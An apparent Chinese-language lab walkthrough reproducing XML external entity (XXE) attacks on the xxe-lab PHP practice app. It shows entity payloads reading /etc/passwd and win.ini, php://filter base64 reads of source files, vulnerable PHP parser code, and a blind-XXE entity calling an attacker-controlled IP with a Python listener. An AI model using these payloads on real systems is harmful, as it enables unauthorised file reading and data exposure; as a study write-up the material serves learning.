前言
安装略过,xxe-lab有好几种环境,此处用的是php
仅学习记录,请勿用于非法用途
XXE还不是很熟悉,如有错误可在评论指正
一、启用环境
开启apache或nginx,访问
http://127.0.0.1/xxe-lab-master/php_xxe/
如果127.0.0.1抓不到包,可以使用内网IP去访问抓包查看提交的数据
二、漏洞复现
[1]. 分析
使用重放模块,发现返回包中会返回
username里面的内容(稍微改了一下格式)
所以只有将实体放在username中,才会回显值
[2]. 构造payload
添加XML声明(好像不用这个也行)
<?xml version="1.0" encoding="UTF-8"?>
DTD文档类型定义,文件名任意取不会有影响,注意DOCTYPE需要大写
DOC表示文档,TYPE翻译过来是类型
<!DOCTYPE 文件名 []>
然后就是声明XML实体用于文件读取,需要放入
DOCTYPE的test中
<!ENTITY 实体名 SYSTEM "file:///绝对路径">
之后就是选择一个会回显数据的xml标签放
&实体名;
c:/windows/win.ini是windows中默认的配置
/etc/passwd是linux中存放账户信息的配置
在回显的情况下,
password调用xml实体时,没有回显passwd的内容就没法通过password标签证明存在xxe漏洞
[3]. 相对路径读取文件
file协议是用于读取绝对路径的,如果需要通过相对路径读取时可以使用php://filter- post数据时,访问的是
doLogin.php文件
需要根据和这个文件的相对路径来- 使用下方的参数读取时会把文件的内容
base64输出
php://filter/read=convert.base64-encode/resource=文件相对路径
- 读取一下当前文件内的
doLogin.php文件(如果不知道有什么文件名,就可以用intruder爆破模块),base64解码后就是文件的内容了- 文件名大小写不会有影响
PD9waHAKLyoqCiogYXV0b3I6IGMwbnkxCiogZGF0ZTogMjAxOC0yLTcKKi8KCiRVU0VSTkFNRSA9ICdhZG1pbic7IC8v6LSm5Y+3CiRQQVNTV09SRCA9ICdhZG1pbic7IC8v5a+G56CBCiRyZXN1bHQgPSBudWxsOwoKbGlieG1sX2Rpc2FibGVfZW50aXR5X2xvYWRlcihmYWxzZSk7CiR4bWxmaWxlID0gZmlsZV9nZXRfY29udGVudHMoJ3BocDovL2lucHV0Jyk7Cgp0cnl7CgkkZG9tID0gbmV3IERPTURvY3VtZW50KCk7CgkkZG9tLT5sb2FkWE1MKCR4bWxmaWxlLCBMSUJYTUxfTk9FTlQgfCBMSUJYTUxfRFRETE9BRCk7CgkkY3JlZHMgPSBzaW1wbGV4bWxfaW1wb3J0X2RvbSgkZG9tKTsKCgkkdXNlcm5hbWUgPSAkY3JlZHMtPnVzZXJuYW1lOwoJJHBhc3N3b3JkID0gJGNyZWRzLT5wYXNzd29yZDsKCglpZigkdXNlcm5hbWUgPT0gJFVTRVJOQU1FICYmICRwYXNzd29yZCA9PSAkUEFTU1dPUkQpewoJCSRyZXN1bHQgPSBzcHJpbnRmKCI8cmVzdWx0Pjxjb2RlPiVkPC9jb2RlPjxtc2c+JXM8L21zZz48L3Jlc3VsdD4iLDEsJHVzZXJuYW1lKTsKCX1lbHNlewoJCSRyZXN1bHQgPSBzcHJpbnRmKCI8cmVzdWx0Pjxjb2RlPiVkPC9jb2RlPjxtc2c+JXM8L21zZz48L3Jlc3VsdD4iLDAsJHVzZXJuYW1lKTsKCX0JCn1jYXRjaChFeGNlcHRpb24gJGUpewoJJHJlc3VsdCA9IHNwcmludGYoIjxyZXN1bHQ+PGNvZGU+JWQ8L2NvZGU+PG1zZz4lczwvbXNnPjwvcmVzdWx0PiIsMywkZS0+Z2V0TWVzc2FnZSgpKTsKfQoKaGVhZGVyKCdDb250ZW50LVR5cGU6IHRleHQvaHRtbDsgY2hhcnNldD11dGYtOCcpOwplY2hvICRyZXN1bHQ7Cj8+
也可以使用
../跳到上一级目录去读取
IyB4eGUtbGFiCgohW1hYRS1MYWJdKGRvYy9YWEUtTEFCLnBuZykKCnh4ZS1sYWLmmK/kuIDkuKrkvb/nlKhwaHAsamF2YSxweXRob24sQyPlm5vnp43lvZPkuIvmnIDluLjnlKjor63oqIDnmoTnvZHnq5nnvJblhpnor63oqIDmnaXnvJblhpnnmoTkuIDkuKrlrZjlnKh4eGXmvI/mtJ7nmoR3ZWIgZGVtb+OAggoK55Sx5LqOeHhl55qEcGF5bG9hZOWcqOS4jeWQjOeahOivreiogOWGhee9rueahHhtbOino+aekOWZqOS4reino+aekOaViOaenOS4jeS4gOagt++8jOS4uuS6hueglOeptuWug+S7rOeahOS4jeWQjOOAguaIkeWIhuWIq+S9v+eUqOW9k+S4i+acgOW4uOeUqOeahOWbm+enjee9keermee8luWGmeivreiogOWGmeS6huWtmOWcqHh4Zea8j+a0nueahHdlYiBkb21lLOS4uuS6huS7peWQjuW+l+a1i+ivleaWueS+v++8jOWwseWwhui/meS6m2RlbW9l5pW05ZCI5Li6eHhlLWxhYuOAguS7o+eggeWKm+axgueugOa0geeugOWNle+8jOWwvemHj+WPquS9v+eUqOWOn+eUn+W6k++8jOWQjOaXtuWcqOazqOmHiumDqOWIhuWMheWQq+S6huS/ruWkjea8j+a0nueahOS7o+eggeOAgnJ1YnnniYjmnKzmnInml7bpl7Tlho3liqDlhaXvvIEKCiMjIOWuieijhQojIyMjIDEucGhwX3h4ZQoK55u05o6l5pS+5ZyocGhwIHdlYumhtemdouS4i+WNs+WPr+i/kOihjOOAggoKIyMjIyAyLmphdmFfeHhlCgpqYXZhX3h4ZeaYr3Nlcmx2ZXTpobnnm67vvIznm7TmjqXlr7zlhaVlY2xpcHNl5b2T5Lit5Y2z5Y+v6YOo572y6L+Q6KGM44CCCgojIyMjIDMucHl0aG9uX3h4ZTogCgoqIOWuieijheWlvUZsYXNr5qih5Z2XCiogcHl0aG9uIHh4ZS5weQoKIyMjIyA0LkNzaGFycF94eGUgCuebtOaOpeWvvOWFpVZT5Lit6L+Q6KGMCiMjIOS4u+eVjOmdogoKIVtwaHBfeHhlXShkb2MvcGhwX3h4ZS5wbmcpCgohW2phdmFfeHhlXShkb2MvamF2YV94eGUucG5nKQoKIVtweXRob25feHhlXShkb2MvcHl0aG9uX3h4ZS5wbmcpCgohW0NzaGFycF94eGVdKGRvYy9Dc2hhcnBfeHhlLnBuZykKCiMjIOa1i+ivlQrmkK3lu7rlpb3njq/looPlkI7lsLHlj6/ku6Xlr7nlkITkuKror63oqIDniYjmnKzov5vooYzmtYvor5XkuobjgILov5nph4zku6VQSFDkuLrkvovlrZDjgIIKCiFbcGhwIFhYRea8lOekul0oZG9jL3BocF94eGVfZGVtby5naWYpCg==
三、无回显XXE
将
doLogin.php修改成如下代码,这样在返回包中就不会有原先的username了
<?php
/**
* autor: c0ny1
* date: 2018-2-7
*/
$USERNAME = 'admin'; //账号
$PASSWORD = 'admin'; //密码
$result = null;
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
try{
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$creds = simplexml_import_dom($dom);
$username = $creds->username;
$password = $creds->password;
if($username == $USERNAME && $password == $PASSWORD){
$result = "登录成功";
//$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
}else{
$result = "登录失败";
//$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
}
}catch(Exception $e){
$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
}
header('Content-Type: text/html; charset=utf-8');
echo $result;
?>
如果目标是不出网的话,可以使用python本地起一个http服务
如果检测到了目标的访问记录,就说明存在xxe漏洞了
python -m http.server [端口]
python2用下面的代码起http服务
python -m SimpleHTTPServer [端口]
然后post如下的xml语句
<!DOCTYPE test[
<!ENTITY data SYSTEM "http://攻击机的IP:端口">
]>
因为提交的
username和password都被服务器处理,但都没有回显
所以无回显情况下,这两个参数调用xml实体都会触发漏洞
